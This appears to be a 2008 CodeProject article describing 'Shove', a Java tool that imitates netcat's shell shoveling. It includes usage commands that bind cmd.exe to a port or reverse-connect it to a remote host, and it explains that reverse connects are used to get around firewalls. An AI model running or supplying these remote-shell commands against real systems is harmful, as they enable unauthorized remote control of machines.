Click here to Skip to main content
5,787,682 members and growing! (16,941 online)
Email Password   helpLost your password?
Languages » Java » General     Advanced License: The Code Project Open License (CPOL)

Shove - Shell Shoveler

By st0le

Emulate the NetCat Feature. 		Java, Java, Dev

Posted: 1 Mar 2008
Updated: 1 Mar 2008
Views: 2,518
Bookmarked: 1 time
Note: This is an unedited reader contribution
Announcements
Comp Mobile Developer Contest
Comp Monthly Competition
Loading...
Chapters
Desktop Development
Web Development
Enterprise Systems
Multimedia
Database
Platforms, Frameworks & Libraries
Languages
General Programming
Graphics / Design
Development Lifecycle
General Reading
Third Party Products

Services
Job Board
Code Project Coffee
Free Magazines

Feature Zones
Product Showcase
IBM DeveloperWorks
WhitePapers / Webcasts
InstallShield 2009
ASP.NET Web Hosting
Search    
Advanced Search
Sitemap
print Print   Broken Article? Report Article       Discuss Discuss   Recommend Article Send to a friend
votes for this Article.
Popularity: 0.00 Rating: 0.00 out of 5
Note: This is an unedited contribution. If this article is inappropriate, needs attention or copies someone else's work without reference then please Report This Article

DISCLAIMER

This Tool was not designed for Malicious Intent. By Using this tool you agree and acknowledge the author (me) does not hold any responsibilty for it's use. This Tool comes with ABSOLUTELY NO WARRANTY. Use at your Own Risk...

Introduction

The Article discusses The Working of an application Shoveller...The Program is called "Shove" and it emulates a netCat (nc.exe) feature called a "Shell Shoveler". Allows a User to Access the Command Prompt (or any console application) of a Remote Machine.

Background

The Following Code also Uses I/O Streams, Sockets, Binding Ports, and The Reverse Connect Back Method...The Reader is Assumed to know what they mean.

How to Build 

	javac interfaceShove.java StreamShovel.java ShoveWrap.java Shove.java

How to Use Shove

Unless you make a jar file...you have to run shove by the following (make sure all "class" files are in same dir) 

usage: Shove [-pPORT] [-aAPPLICATION] [-hREMOTEHOST]

1) Bind Shell 

c:\[DIR]>java -classpath . Shove 
//runs in default config (bindshell 7978)

c:\[DIR]>java -classpath . Shove -p53
//(bindshell 53)

2) Reverse Connect 

c:\[DIR]>java -classpath . Shove -p90 -acmd.exe -h200.200.200.2
//repeatedly connects to 200.200.200.2 at port 90. if success shovels a shell 
//on your machine "nc -l -p90"

Why Reverse Connect Method?

The Reverse Connect Method is Used to Circumvent Firewalls, NAT Traversal, etc. Since Our Incoming Attempts to connect to the host will fail in case of a firewall, we ask the host to connect to us (since the firewall "should" allow outgoing connections). It's Usually used in Exploits. But, For shove it has to be manually set up. So you don't need to add new Rules to your Firewall and compromise.

How it Works?

For Every Process there are 3 Streams Stdin,StdOut,StdErr .
For a Console Application, The Stdin refers to Keyboard input. The StdOut and StdErr Point the Console Window. There are Methods of Redirecting the Streams to Different Streams For eg. ( dir *.* > list.txt )
This way The Output Stream (stdout,stderr) are redirected to the file input stream (list.txt). In a Similar way, Sockets have an InputStream and an OutputStream. Shove Simply redirects the OutputStream of The Socket to the InputStream of The Process (Stdin) and InputStream of The Socket to OutputStream of the Process (stdout,stderr). So when the socket recieves the data, it is sent to the process, the output from the process is sent back through the socket to a remote user...

Points of Interest

The Utility is Inspired from a Single Feature of NetCat (by Hobbit) - The Swiss Army Knife of Networking.

Author's Notes

Now, java programs are supposed to be platform independent,but I don't have Access to another OS to test it out, but i'm curious to whether it will work on any other OS. So I request people of CP to test it out and post their feedback.

History

Original Draft : 2 March 2008

License

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

About the Author

st0le


 I'm Currently a Computer Science Engg. Student From Mumbai,India. My Fields of Interest Include Data Compression, Algorithms, Virus/Anti-Virus Technologies, Socket Programming, Security. Current Skill Set Includes C, VC++ (non-MFC), VB, VBS, JS, HTML, Java and a bit of Assembly.

I enjoy participating in programming contests. Other Than that I also write a bit of poetry (http://midnightpoet.blogspot.com). I'm also a Amatuer Card/Coin Magician. For my free time i usually perform for my friends and family and sometimes *cough*always*cough* end up screwing up the entire trick and revealing it's secret although i must add i have a killer Pass (magician's will know.)
Occupation: Other
Company: Student
Location: India India

Other popular Java articles:
Article Top
Sign Up to vote for this article
You must Sign In to use this message board.
FAQ FAQ Noise ToleranceSearch Search Messages 
 Layout  Per page   
  (Refresh) 
-- There are no messages in this forum --

General General    News News    Question Question    Answer Answer    Joke Joke    Rant Rant    Admin Admin   

PermaLink | Privacy | Terms of Use
Last Updated: 1 Mar 2008
Editor: Sean Ewington
 Copyright 2008 by st0le
Everything else Copyright © CodeProject, 1999-2009
Web13 | Advertise on the Code Project